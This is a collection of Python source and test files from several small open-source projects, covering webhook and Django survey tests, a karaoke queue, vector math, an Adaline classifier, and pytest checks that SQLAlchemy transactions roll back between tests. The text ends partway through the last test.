headers=headers)
self.assertEqual(post_request.status_code, 401)
response = json.loads(post_request.data.decode('utf-8'))
expected = 'Request signature failed to authenticate'
self.assertEqual(response.get('status'), expected)
def test_incorrect_branch_name(self):
'''
When the ref path from GitHub is different from the hook branch name,
make sure that the app does nothing.
'''
post_data = json.dumps({'ref': 'refs/heads/master'})
headers = Headers()
headers.add('X-Hub-Signature', self.good_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/deploy',
content_type='application/json',
data=post_data,
headers=headers)
self.assertEqual(post_request.status_code, 400)
response = json.loads(post_request.data.decode('utf-8'))
msg = 'Skipping build for unregistered branch "refs/heads/master"'
self.assertEqual(response.get('status'), msg)
def test_no_ref(self):
'''
Test a bad request (does not contain the `ref` attribute).
'''
post_data = json.dumps({'test': 'test'})
headers = Headers()
headers.add('X-Hub-Signature', self.good_sig)
with self.authenticate():
post_request = self.app.post('/hooks/github/deploy',
content_type='application/json',
data=post_data,
headers=headers)
self.assertEqual(post_request.status_code, 400)
response = json.loads(post_request.data.decode('utf-8'))
expected = "Malformed request payload: {'test': 'test'}"
self.assertEqual(response.get('status'), expected)
```
|
{
"source": "jeancochrane/just-spaces",
"score": 2
}
|
#### File: intercept/income/fobi_form_elements.py
```python
from django import forms
from fobi.base import FormFieldPlugin, form_element_plugin_registry
from ..forms import INCOME_CHOICES
from .forms import IncomeForm
class IncomePlugin(FormFieldPlugin):
"""IncomePlugin."""
uid = "income"
name = "What income group does your household fall under?"
form = IncomeForm
group = "Intercept" # Group to which the plugin belongs to
def get_form_field_instances(self, request=None, form_entry=None,
form_element_entries=None, **kwargs):
field_kwargs = {
'required': self.data.required,
'label': self.data.label,
'widget': forms.widgets.Select(attrs={}),
'choices': INCOME_CHOICES,
}
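        # fobi instantiates each returned (name, field_class, kwargs) triple
        # roughly as field_class(**kwargs) when rendering the form (a sketch
        # of the contract, not exact fobi internals).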
return [(self.data.name, forms.ChoiceField, field_kwargs)]
form_element_plugin_registry.register(IncomePlugin)
```
#### File: observational/age_observational/fobi_form_elements.py
```python
import sys
from fobi.base import FormFieldPlugin, form_element_plugin_registry
from pldp.forms import AGE_BASIC_CHOICES, AGE_DETAILED_CHOICES, \
AGE_COMPLEX_CHOICES
from ..widgets import ObservationalWidget
from ..fields import ObservationalField
from .forms import AgeObservationalForm
class AgeObservationalPlugin(FormFieldPlugin):
"""AgeObservationalPlugin."""
uid = "age_observational"
name = "Age"
form = AgeObservationalForm
group = "Observational" # Group to which the plugin belongs to
def get_form_field_instances(self, request=None, form_entry=None,
form_element_entries=None, **kwargs):
choice_level = 'AGE_{}_CHOICES'.format(self.data.detail_level.upper())
choices = getattr(sys.modules[__name__], choice_level)
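        # e.g. detail_level == 'basic' resolves to AGE_BASIC_CHOICES imported
        # above; the lookup is dynamic over this module's namespace.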
field_kwargs = {
'required': self.data.required,
'label': self.data.label,
'choices': choices,
'widget': ObservationalWidget(choices=choices)
}
return [(self.data.name, ObservationalField, field_kwargs)]
form_element_plugin_registry.register(AgeObservationalPlugin)
```
#### File: just-spaces/tests/test_dad.py
```python
import pytest
from django.urls import reverse
from surveys import models
@pytest.fixture
def survey_submitted_setup(survey, survey_row, survey_component):
# Set up necessary fixtures for the surveys-submitted-detail view
pass
def create_formset_data(initial, total, forms):
# Helper function to create POST data for a formset in the DAD.
# Arguments:
# * initial (int): Initial number of forms on the page at load time
# * total (int): Total number of forms on the page at POST time
# * forms (iterable): Iterable of dictionaries, each one representing the
# field value for a form in the formset
output_form = {
# Initialize with management form data
'form-INITIAL_FORMS': initial,
'form-TOTAL_FORMS': total,
}
for idx, form in enumerate(forms):
prefix = 'form-' + str(idx) + '-'
for field_name, value in form.items():
output_form[prefix + field_name] = value
return output_form
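# For example, create_formset_data(0, 1, [{'short_description': 'x', 'order': 1}])
# returns {'form-INITIAL_FORMS': 0, 'form-TOTAL_FORMS': 1,
#          'form-0-short_description': 'x', 'form-0-order': 1}.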
def test_create_chart(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD can create a chart
chart_data = [{'short_description': '__foobar__', 'order': 1}]
post_data = create_formset_data(0, len(chart_data), chart_data)
create_url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
create_response = client.post(create_url, data=post_data)
assert create_response.status_code == 200
assert 'alert-success' in create_response.content.decode('utf-8')
assert chart_data[0]['short_description'] in create_response.content.decode('utf-8')
new_chart = models.SurveyChart.objects.get(id=1)
assert new_chart.short_description == chart_data[0]['short_description']
def test_basic_chart_display(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD displays charts in the correct number and order
chart_data = [
{'short_description': '__bar__', 'order': 2},
{'short_description': '__foo__', 'order': 1},
{'short_description': '__baz__', 'order': 3}
]
post_data = create_formset_data(0, len(chart_data), chart_data)
create_url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
create_response = client.post(create_url, data=post_data)
assert create_response.status_code == 200
assert 'alert-success' in create_response.content.decode('utf-8')
# Make sure the charts are displayed in the correct order
sorted_charts = sorted(chart_data, key=lambda chart: chart['order'])
for idx, form in enumerate(sorted_charts):
assert form['short_description'] in create_response.content.decode('utf-8')
if idx == len(sorted_charts)-1:
prev_desc = sorted_charts[idx-1]['short_description']
assert prev_desc in create_response.content.decode('utf-8').split(form['short_description'])[0]
else:
next_desc = sorted_charts[idx+1]['short_description']
assert next_desc in create_response.content.decode('utf-8').split(form['short_description'])[1]
def test_delete_chart(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD can delete a chart
chart_data = {
'short_description': '__delete_me__',
'order': 1,
'form_entry': survey_form_entry
}
new_chart = models.SurveyChart.objects.create(**chart_data)
url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
get_response = client.get(url)
assert get_response.status_code == 200
assert chart_data['short_description'] in get_response.content.decode('utf-8')
forms_to_delete = [chart_data.copy()]
forms_to_delete[0].update({'id': new_chart.id, 'DELETE': True})
post_data = create_formset_data(1, len(forms_to_delete), forms_to_delete)
delete_response = client.post(url, data=post_data)
assert delete_response.status_code == 200
assert 'alert-success' in delete_response.content.decode('utf-8')
assert chart_data['short_description'] not in delete_response.content.decode('utf-8')
def test_ignore_new_removed_chart(client, survey_form_entry, survey_submitted_setup):
# Test that the DAD will not create a new chart if the 'delete' field is checked
chart_data = [{'short_description': '__delete_me__', 'order': 1, 'DELETE': True}]
post_data = create_formset_data(0, len(chart_data), chart_data)
create_url = reverse('surveys-submitted-detail',
kwargs={'form_entry_id': survey_form_entry.id})
create_response = client.post(create_url, data=post_data)
assert create_response.status_code == 200
assert 'alert-success' in create_response.content.decode('utf-8')
assert chart_data[0]['short_description'] not in create_response.content.decode('utf-8')
```
#### File: just-spaces/tests/test_views.py
```python
import pytest
from django.urls import reverse
from pldp.forms import AGE_COMPLEX_CHOICES
@pytest.mark.django_db
def test_survey_list_edit(client, user, survey_form_entry, survey_form_entry_observational):
client.force_login(user)
url = reverse('surveys-list-edit')
response = client.get(url)
surveys = response.context['surveys']
assert response.status_code == 200
assert len(surveys) == 1
@pytest.mark.django_db
def test_survey_list_run(client, user, survey_form_entry, survey_form_entry_observational):
client.force_login(user)
url = reverse('surveys-list-run')
response = client.get(url)
surveys = response.context['surveys']
assert response.status_code == 200
assert len(surveys) == 1
@pytest.mark.django_db
def test_survey_edit_intercept(client, user, survey_form_entry):
client.force_login(user)
url = reverse('fobi.edit_form_entry', kwargs={'form_entry_id': survey_form_entry.id})
response = client.get(url)
plugins = response.context['user_form_element_plugins']
    intercept_presets = [
        ('age_intercept', 'How old are you?'),
        ('education', 'What is your highest formal degree of education?'),
        ('employment', 'What is your current employment status?'),
        ('gender_intercept', 'What gender do you most identify with?'),
        ('household_tenure', 'How many years have you lived at your current address?'),
        ('income', 'Are you a homeowner or a renter?'),
        ('race', 'Which race or ethnicity best describes you?'),
        ('transportation', 'How did you travel here?'),
    ]
assert response.status_code == 200
assert len(plugins) == 4
for question in intercept_presets:
assert question in plugins['Intercept']
@pytest.mark.django_db
def test_survey_edit_observational(client, user, survey_form_entry_observational, form_element_observational):
client.force_login(user)
url = reverse('fobi.edit_form_entry', kwargs={'form_entry_id': survey_form_entry_observational.id})
response = client.get(url)
plugins = response.context['user_form_element_plugins']
html = response.content.decode('utf-8')
assert response.status_code == 200
assert len(plugins) == 4
for choice, _ in AGE_COMPLEX_CHOICES:
label = '<label>{}</label>'.format(choice)
assert label in html
@pytest.mark.django_db
def test_survey_preview(client, user, survey_form_entry_observational):
client.force_login(user)
url = reverse('fobi.view_form_entry', kwargs={'form_entry_slug': survey_form_entry_observational.slug})
response = client.get(url)
assert response.status_code == 200
assert not response.context['form_entry'].surveyformentry.published
assert ('Preview ' + survey_form_entry_observational.name) in response.content.decode('utf-8')
@pytest.mark.django_db
def test_survey_publish(client, survey_form_entry_observational):
assert not survey_form_entry_observational.published
url = reverse('surveys-publish', kwargs={'form_entry_id': survey_form_entry_observational.id})
get_response = client.get(url)
assert get_response.status_code == 200
post_response = client.post(url)
survey_form_entry_observational.refresh_from_db()
assert post_response.status_code == 302
assert survey_form_entry_observational.published
@pytest.mark.django_db
def test_survey_submitted_list(client, user, survey, survey_form_entry):
client.force_login(user)
url = reverse('surveys-submitted-list')
response = client.get(url)
surveys_submitted = response.context['surveys_submitted']
assert response.status_code == 200
assert len(surveys_submitted) == 1
assert str(surveys_submitted.first().form_title) == 'Sample Form Entry'
@pytest.mark.django_db
def test_survey_submitted_detail(client, user, survey_form_entry, survey, survey_row, survey_component):
client.force_login(user)
url = reverse('surveys-submitted-detail', kwargs={'form_entry_id': survey_form_entry.id})
response = client.get(url)
surveys_submitted = response.context['surveys_submitted']
assert response.status_code == 200
assert len(surveys_submitted) == 1
```
|
{
"source": "jeancochrane/karaoke-party",
"score": 3
}
|
#### File: karaoke-party/tests/conftest.py
```python
from unittest import TestCase
import tests.env
import karaoke
class KaraokeTestCase(TestCase):
'''
Create a test client for the app.
'''
@classmethod
def setUpClass(cls):
'''
Initialize testing configs and create a test app.
'''
karaoke.app.testing = True
karaoke.app.config.from_object('tests.test_settings')
# Create a test client
cls.app = karaoke.app.test_client()
```
#### File: karaoke-party/tests/test_queue.py
```python
from unittest import TestCase
import psycopg2 as pg
import psycopg2.extensions as pg_extensions
import tests.env
import karaoke
from karaoke.queue import Queue
from karaoke.exceptions import QueueError
from tests.conftest import KaraokeTestCase
class TestQueue(KaraokeTestCase):
'''
Test some methods of the Queue class.
'''
@classmethod
def setUpClass(cls):
'''
Set up a test client and database.
'''
# Create the test database using an external connection
cls.ext_conn = karaoke.connect_db()
cls.ext_conn.set_isolation_level(pg_extensions.ISOLATION_LEVEL_AUTOCOMMIT)
with cls.ext_conn:
with cls.ext_conn.cursor() as curs:
curs.execute('CREATE DATABASE karaoke_test;')
# Set up the test client
super().setUpClass()
# Initialize the test database
with karaoke.app.app_context():
karaoke.init_db()
# Connect to the test database and create a queue to test
cls.conn = karaoke.connect_db()
cls.queue = Queue(cls.conn)
# Load some fake song data
with cls.conn:
with cls.conn.cursor() as curs:
curs.execute('''
INSERT INTO song
(title, artist, url)
VALUES
('foo', 'bar', 'baz')
''')
@classmethod
def tearDownClass(cls):
'''
Remove the test database and close out the connection.
'''
cls.conn.close()
with cls.ext_conn:
with cls.ext_conn.cursor() as curs:
curs.execute('DROP DATABASE karaoke_test')
# Close out all connections
cls.ext_conn.close()
def tearDown(self):
self.queue.flush()
def test_queue_add_and_get(self):
singer, song_id = 'foo', 1
queue_id = self.queue.add(singer, song_id)
queue_attrs = self.queue.get()
# Make sure the queue returns all of the original information
for orig, returned in zip(queue_attrs, (singer, song_id, queue_id)):
self.assertEqual(orig, returned)
def test_queue_get_empty(self):
no_singer, no_song_id, no_queue_id = self.queue.get()
# Make sure there's nothing on the queue
for item in (no_singer, no_song_id, no_queue_id):
self.assertIsNone(item)
def test_queue_delete(self):
singer, song_id = 'foo', 1
self.queue.add(singer, song_id)
got_singer, got_song_id, queue_id = self.queue.get()
deleted_id = self.queue.delete(queue_id)
self.assertEqual(queue_id, deleted_id)
# Make sure there's nothing on the queue
no_singer, no_song_id, no_queue_id = self.queue.get()
for item in (no_singer, no_song_id, no_queue_id):
self.assertIsNone(item)
def test_queue_delete_raises_error(self):
# Delete an item that isn't on the queue
with self.assertRaises(QueueError):
self.queue.delete(1)
def test_queue_flush(self):
singer, song_id = 'foo', 1
self.queue.add(singer, song_id)
self.queue.flush()
# Make sure there's nothing on the queue
no_singer, no_song_id, no_queue_id = self.queue.get()
for item in (no_singer, no_song_id, no_queue_id):
self.assertIsNone(item)
```
#### File: karaoke-party/tests/test_routes.py
```python
import unittest
import json
from unittest.mock import MagicMock, patch
import karaoke
from karaoke.queue import Queue
from karaoke.exceptions import QueueError
import tests.env
from tests.conftest import KaraokeTestCase
# POST data fixture
POST_DATA = {
'singer': 'foo',
'song_id': '1',
}
class TestRoutes(KaraokeTestCase):
'''
Test the API routes.
'''
@classmethod
def setUpClass(cls):
'''
Mock out database access.
'''
super().setUpClass()
cls.patcher = patch('karaoke.routes.get_db')
cls.patcher.start()
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
def assertResponseEqual(self, condition, response):
'''
Helper method that wraps `self.assertEqual()` and provides more exception
context.
'''
try:
self.assertEqual(*condition)
except AssertionError as e:
print(response.data.decode('utf-8'))
raise e
def test_play_resolves(self):
get_request = self.app.get('/play')
self.assertResponseEqual((get_request.status_code, 200), response=get_request)
def test_songs_resolves(self):
get_request = self.app.get('/songs')
self.assertResponseEqual((get_request.status_code, 200), response=get_request)
@patch('karaoke.routes.Queue.add', return_value=1)
def test_add_to_queue(self, mock_queue):
post_request = self.app.post('/queue', data=POST_DATA)
self.assertResponseEqual((post_request.status_code, 200), response=post_request)
json_response = json.loads(post_request.data.decode('utf-8'))
self.assertEqual(json_response.get('queue_id'), 1)
@patch('karaoke.routes.Queue.get', return_value=(POST_DATA['singer'], POST_DATA['song_id'], 1))
def test_get_from_queue(self, mock_queue):
get_request = self.app.get('/queue')
self.assertResponseEqual((get_request.status_code, 200), response=get_request)
json_response = json.loads(get_request.data.decode('utf-8'))
self.assertEqual(json_response.get('singer'), POST_DATA['singer'])
self.assertEqual(json_response.get('song_id'), POST_DATA['song_id'])
self.assertEqual(json_response.get('queue_id'), 1)
@patch('karaoke.routes.Queue.delete', return_value=1)
def test_delete_from_queue(self, mock_queue):
delete_request = self.app.post('/queue?delete=true&queue_id=1')
self.assertResponseEqual((delete_request.status_code, 200), response=delete_request)
delete_response = json.loads(delete_request.data.decode('utf-8'))
self.assertEqual(delete_response.get('queue_id'), 1)
def test_queue_delete_missing_id(self):
# Test a missing id parameter for deletion
missing_id = self.app.post('/queue?delete=true')
self.assertResponseEqual((missing_id.status_code, 403), response=missing_id)
missing_id_response = json.loads(missing_id.data.decode('utf-8'))
self.assertEqual(missing_id_response.get('status'),
'a `delete` request requires an `id` parameter')
def test_queue_add_missing_singer(self):
# Test missing singer form data
missing_singer_data = {'song_id': '1'}
missing_singer = self.app.post('/queue', data=missing_singer_data)
self.assertResponseEqual((missing_singer.status_code, 403), response=missing_singer)
missing_singer_response = json.loads(missing_singer.data.decode('utf-8'))
self.assertEqual(missing_singer_response.get('status'),
'an `add` request requires form data for a `singer` and `song_id`')
def test_queue_add_missing_song(self):
# Test missing song_id form data
missing_song_data = {'singer': 'foo'}
missing_song = self.app.post('/queue', data=missing_song_data)
self.assertResponseEqual((missing_song.status_code, 403), response=missing_song)
missing_song_response = json.loads(missing_song.data.decode('utf-8'))
self.assertEqual(missing_song_response.get('status'),
'an `add` request requires form data for a `singer` and `song_id`')
@patch('karaoke.routes.Queue.delete', side_effect=QueueError)
def test_queue_delete_queue_id_doesnt_exist(self, mock_queue):
# Test a delete request for a song that doesn't exist
bad_queue_id = self.app.post('/queue?delete=true&queue_id=1')
self.assertResponseEqual((bad_queue_id.status_code, 403), response=bad_queue_id)
bad_queue_id_response = json.loads(bad_queue_id.data.decode('utf-8'))
self.assertEqual(bad_queue_id_response.get('status'),
'an item was not found on the queue with the id 1')
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "jeancochrane/learning",
"score": 3
}
|
#### File: linear-algebra/tests/test_vector_operations.py
```python
import unittest
import env
from linalg.vector import Vector
class TestVectorOperations(unittest.TestCase):
def test_vector_equality(self):
a = Vector([1, 2, 3])
b = Vector([1, 2, 3])
self.assertEqual(a, b)
def test_vector_inequality(self):
a = Vector([1, 2, 3])
b = Vector([4, 5, 6])
self.assertNotEqual(a, b)
def test_vector_addition(self):
a = Vector([8.218, -9.341])
b = Vector([-1.129, 2.111])
self.assertEqual(a + b, Vector([7.089, -7.229999999999999]))
def test_vector_subtraction(self):
a = Vector([7.119, 8.215])
b = Vector([-8.223, 0.878])
self.assertEqual(a - b, Vector([15.342, 7.337]))
def test_scalar_multiplication(self):
a = Vector([1.671, -1.012, -0.318])
c = 7.41
self.assertEqual(a * c, Vector([12.38211, -7.49892, -2.35638]))
def test_vector_rounding(self):
v = Vector([1.2345, 6.6789])
self.assertEqual(v.round(2), Vector([1.23, 6.68]))
def test_vector_magnitude(self):
v = Vector([-0.221, 7.437])
self.assertEqual(round(v.magnitude(), 3), 7.440)
def test_vector_normalization(self):
w = Vector([1.996, 3.108, -4.554])
self.assertEqual(w.normalized(), Vector([0.3404012959433014,
0.5300437012984873,
-0.7766470449528028]))
def test_dot_product(self):
v = Vector([7.887, 4.138])
w = Vector([-8.802, 6.776])
self.assertEqual(round(v.dot(w), 3), -41.382)
    def test_dot_product_commutative(self):
        """
        The dot product is commutative, meaning it shouldn't matter what
        order the vectors go in.
        """
v = Vector([7, 4])
w = Vector([-8, 6.776])
self.assertEqual(v.dot(w), w.dot(v))
def test_inner_angle_radians(self):
v = Vector([3.183, -7.627])
w = Vector([-2.668, 5.319])
self.assertEqual(round(v.inner_angle(w), 3), 3.072)
def test_inner_angle_degrees(self):
v = Vector([7.35, 0.221, 5.188])
w = Vector([2.751, 8.259, 3.985])
self.assertEqual(round(v.inner_angle(w, degrees=True), 3), 60.276)
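    # (inner_angle presumably computes arccos(v . w / (|v| * |w|)); e.g. for
    # v = (1, 0) and w = (0, 1) the dot product is 0, so the angle is pi / 2,
    # i.e. 90 degrees.)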
def test_orthogonality(self):
v = Vector([-7.579, -7.88])
w = Vector([22.737, 23.64])
self.assertFalse(v.is_orthogonal(w))
v = Vector([-2.029, 9.97, 4.172])
w = Vector([-9.231, -6.639, -7.245])
self.assertFalse(v.is_orthogonal(w))
v = Vector([-2.328, -7.284, -1.214])
w = Vector([-1.821, 1.072, -2.94])
self.assertTrue(v.is_orthogonal(w))
v = Vector([2.118, 4.827])
w = Vector([0, 0])
self.assertTrue(v.is_orthogonal(w))
def test_parallelism(self):
v = Vector([-7.579, -7.88])
w = Vector([22.737, 23.64])
self.assertTrue(v.is_parallel(w))
v = Vector([-2.029, 9.97, 4.172])
w = Vector([-9.231, -6.639, -7.245])
self.assertFalse(v.is_parallel(w))
v = Vector([-2.328, -7.284, -1.214])
w = Vector([-1.821, 1.072, -2.94])
self.assertFalse(v.is_parallel(w))
v = Vector([2.118, 4.827])
w = Vector([0, 0])
self.assertTrue(v.is_parallel(w))
def test_identity_vector_orthogonality_and_parallelism(self):
"""
The zero vector is the only vector that is both orthogonal and
parallel to itself.
"""
v = Vector([0, 0, 0])
self.assertTrue(v.is_orthogonal(v))
self.assertTrue(v.is_parallel(v))
w = Vector([4, 5, 6])
self.assertFalse(w.is_orthogonal(w))
self.assertTrue(w.is_parallel(w))
def test_vector_projections(self):
"""
Testing vector projection, orthogonal components, and
decomposition.
"""
v = Vector([3.039, 1.879])
b = Vector([0.825, 2.036])
proj = v.project(b)
self.assertEqual(proj.round(3), Vector([1.083, 2.672]))
v = Vector([-9.88, -3.264, -8.159])
b = Vector([-2.155, -9.353, -9.473])
orth = v.orthogonal_component(b)
try:
self.assertEqual(orth.round(3), Vector([-8.350, 3.376, -1.434]))
except AssertionError as e:
print(orth.round(3))
print(Vector([-8.350, 3.376, -1.434]))
raise(e)
v = Vector([3.009, -6.172, 3.692, -2.51])
b = Vector([6.404, -9.144, 2.759, 8.718])
v_decomposed = (v.project(b) +
v.orthogonal_component(b))
self.assertEqual(v, v_decomposed.round(3))
def test_cross_product(self):
"""
Testing the calculation of cross products, as well as the areas
of parallelograms and triangles spanned by different vectors.
"""
v = Vector([8.462, 7.893, -8.187])
w = Vector([6.984, -5.975, 4.778])
cross = v.cross(w)
self.assertEqual(cross.round(3), Vector([-11.205,
-97.609,
-105.685]))
v = Vector([-8.987, -9.838, 5.031])
w = Vector([-4.268, -1.861, -8.866])
par_area = v.parallelogram_area(w)
self.assertEqual(round(par_area, 3), 142.122)
v = Vector([1.5, 9.547, 3.691])
w = Vector([-6.007, 0.124, 5.772])
tri_area = v.triangle_area(w)
self.assertEqual(round(tri_area, 3), 42.565)
if __name__ == '__main__':
unittest.main()
```
#### File: code/algos/adaline.py
```python
import numpy as np
class Adaline(object):
def __init__(self, bias=0, eta=0.01, epoch=10, stochastic=False,
shuffle=True):
self.bias = bias
self.eta = eta
self.epoch = epoch
self.stochastic = stochastic
self.shuffle = shuffle
def net_input(self, x):
return self.weights[0] + np.dot(x, self.weights[1:])
def _initialize_weights(self, X):
self.weights = np.zeros(1 + X.shape[1])
self.weights[0] = -self.bias
return self
def fit(self, X, y):
self._initialize_weights(X)
self.cost = []
for _ in range(self.epoch):
if self.shuffle:
X, y = self._shuffle(X, y)
if self.stochastic:
cost = []
for xi, yi in zip(X, y):
error = yi - self.activation(xi)
self.weights[0] += self.eta * error
self.weights[1:] += self.eta * xi.dot(error)
cost.append(error**2 / 2)
self.cost.append(sum(cost) / len(cost))
else:
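                # Batch (Widrow-Hoff) update: w <- w + eta * X^T (y - Xw),
                # i.e. one gradient-descent step on the summed squared-error
                # cost computed below.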
errors = y - self.activation(X)
self.weights[0] += self.eta * errors.sum()
self.weights[1:] += self.eta * X.T.dot(errors)
cost = (errors**2).sum() / 2
self.cost.append(cost)
return self
def partial_fit(self, X, y):
try:
assert len(self.weights)
except AttributeError:
self._initialize_weights(X)
error = y - self.activation(X)
self.weights[0] += self.eta * error
self.weights[1:] += self.eta * X.dot(error)
return self
def activation(self, x):
return self.net_input(x)
def predict(self, x):
return np.where(self.activation(x) >= 0, 1, -1)
def _shuffle(self, X, y):
order = np.random.permutation(len(y))
return X[order], y[order]
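if __name__ == '__main__':
    # Minimal sketch: fit Adaline on a tiny AND-style toy set with labels in
    # {-1, 1}; the data and hyperparameters here are illustrative only.
    X = np.array([[0., 0.], [0., 1.], [1., 0.], [1., 1.]])
    y = np.array([-1, -1, -1, 1])
    model = Adaline(eta=0.05, epoch=50).fit(X, y)
    print(model.predict(X))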
```
|
{
"source": "jeancochrane/mellow-bike-map",
"score": 3
}
|
#### File: mellow-bike-map/tests/test_views.py
```python
import pytest
from mbm import views
@pytest.mark.parametrize('dist_in_meters,expected', [
(100, ('0.1 miles', '<1 minute')),
(300, ('0.2 miles', '1 minute')),
(1000, ('0.6 miles', '4 minutes')),
(1609, ('1.0 miles', '6 minutes'))
])
def test_format_distance(dist_in_meters, expected):
route = views.Route()
distance, time = route.format_distance(dist_in_meters)
expected_dist, expected_time = expected
assert distance == expected_dist
assert time == expected_time
```
|
{
"source": "jeancochrane/pytest-flask-sqlalchemy-transactions",
"score": 3
}
|
#### File: pytest-flask-sqlalchemy-transactions/tests/test_fixtures.py
```python
import os
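# Each test in this module follows the pytester pattern: write an inner test
# module with makepyfile(), run it with runpytest(), and assert on the outcome
# counts, so fixture behavior is exercised in a fresh pytest run.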
def test_use_db_session_to_alter_database(db_testdir):
'''
Test that creating objects and emitting SQL in the ORM won't bleed into
other tests.
'''
# Load tests from file
db_testdir.makepyfile("""
def test_use_db_session_to_alter_database(person, db_engine, db_session):
# Create a new object instance using the ORM
opts = {
'id': 1,
'name': 'tester'
}
new_inst = person(**opts)
db_session.add(new_inst)
db_session.commit()
# Create a new object instance by emitting raw SQL from the session object
db_session.execute('''
insert into person (id, name)
values (2, '<NAME>')
''')
# Make sure that the session object has registered changes
name_list = db_session.execute('''select name from person''').fetchall()
names = [name[0] for name in name_list]
assert 'tester' in names
assert '<NAME>' in names
def test_db_session_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
# Run tests
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_use_db_engine_to_alter_database(db_testdir):
'''
Use the `db_engine` fixture to alter the database directly.
'''
db_testdir.makepyfile("""
def test_use_db_engine_to_alter_database(person, db_engine, db_session):
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
# Use the contextmanager to retrieve a connection
with db_engine.begin() as conn:
conn.execute('''
insert into person (id, name)
values (2, '<NAME>')
''')
first_person = db_session.query(person).get(1)
second_person = db_session.query(person).get(2)
assert first_person.name == 'tester'
assert second_person.name == '<NAME>'
def test_db_engine_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_raise_programmingerror_rolls_back_transaction(db_testdir):
'''
Make sure that when a ProgrammingError gets raised and handled, the
connection will continue to be usable.
'''
db_testdir.makepyfile("""
import pytest
import sqlalchemy as sa
def test_raise_programmingerror_rolls_back_transaction(person, db_engine, db_session):
# Confirm that we can raise a ProgrammingError
with pytest.raises(sa.exc.ProgrammingError):
# Run a query that doesn't correspond to an existing table
with db_engine.begin() as conn:
db_engine.execute('''
SELECT record_count FROM 'browser'
''')
# Handle the ProgrammingError the way we do in the code (try/except block)
try:
with db_engine.begin() as conn:
conn.execute('''
SELECT record_count FROM 'browser'
''')
except sa.exc.ProgrammingError:
pass
# This query will raise an InternalError if ProgrammingErrors don't get handled properly,
# since the ProgrammingError aborts the transaction by default
with db_engine.begin() as conn:
nonexistent_person = conn.execute('''SELECT name FROM person''').fetchone()
assert not nonexistent_person
# Make some changes that we can check in the following test
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
person = db_session.query(person).get(1)
assert person.name == 'tester'
def test_raise_programmingerror_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_transaction_commit(db_testdir):
'''
Make some changes directly using the Transaction object and confirm that
they appear.
'''
db_testdir.makepyfile("""
def test_transaction_commit(person, db_engine, db_session):
with db_engine.begin() as conn:
trans = conn.begin()
conn.execute('''
insert into person (id, name)
values (1, 'tester')
''')
trans.commit()
conn.close()
person = db_session.query(person).get(1)
assert person.name == 'tester'
def test_transaction_commit_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_transaction_rollback(db_testdir):
'''
Attempt to roll back the active transaction and then alter the database. When not
handled properly, this can have the effect of causing changes to persist
across tests.
'''
db_testdir.makepyfile("""
import sqlalchemy as sa
def test_transaction_rollback(person, db_engine, db_session):
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
with db_engine.begin() as conn:
trans = conn.begin()
try:
conn.execute('''
SELECT record_count FROM 'browser'
''')
except sa.exc.ProgrammingError:
trans.rollback()
conn.close()
person = db_session.query(person).get(1)
assert person.name == 'tester'
def test_transaction_rollback_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_drop_table(db_testdir):
'''
Make sure that we can drop tables and verify they do not exist in the context
of a test.
'''
db_testdir.makepyfile("""
def test_drop_table(person, db_engine):
# Drop the raw table
db_engine.execute('''
DROP TABLE "person"
''')
# Check if the raw table exists
existing_tables = db_engine.execute('''
SELECT relname
FROM pg_catalog.pg_class
WHERE relkind in ('r', 'm')
AND relname = 'person'
''').first()
assert not existing_tables
def test_drop_table_changes_dont_persist(person, db_engine):
existing_tables = db_engine.execute('''
SELECT relname
FROM pg_catalog.pg_class
WHERE relkind in ('r', 'm')
AND relname = 'person'
''').first()
assert existing_tables
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_use_raw_connection_to_alter_database(db_testdir):
'''
Retrieve a raw DBAPI connection and use it to make changes to the database.
'''
db_testdir.makepyfile("""
def test_use_raw_connection_to_alter_database(person, db_engine, db_session):
# Make some changes so that we can make sure they persist after a raw connection
# rollback
db_engine.execute('''
insert into person (id, name)
values (1, 'tester')
''')
# Make changes with a raw connection
conn = db_engine.raw_connection()
cursor = conn.cursor()
cursor.execute('''
insert into person (id, name)
values (2, '<NAME>')
''')
conn.commit()
# Check to make sure that the changes are visible to the original connection
second_person = db_engine.execute('''select name from person where id = 2''').fetchone()[0]
assert second_person == '<NAME>'
# Roll back the changes made by the raw connection
conn.rollback()
conn.close()
# Make sure earlier changes made by the original connection persist after rollback
orig_person = db_session.query(person).get(1)
assert orig_person.name == 'tester'
def test_raw_connection_changes_dont_persist(person, db_engine, db_session):
assert not db_engine.execute('''select * from person''').fetchone()
assert not db_session.query(person).first()
""")
result = db_testdir.runpytest()
result.assert_outcomes(passed=2)
def test_commit_works_with_deleted_dependent(db_testdir):
'''
Make sure a commit still works with a dangling reference to a
deleted instance.
Exercise one way to trigger the issue reported in
https://github.com/jeancochrane/pytest-flask-sqlalchemy/issues/5
'''
db_testdir.makepyfile("""
def test_delete_message(account_address, db_session):
account, address = account_address
# Create a new object instance using the ORM
account_inst = account(id=1)
db_session.add(account_inst)
# Create a dependent object instance using the ORM
address_inst = address(id=101, account_id=1)
db_session.add(address_inst)
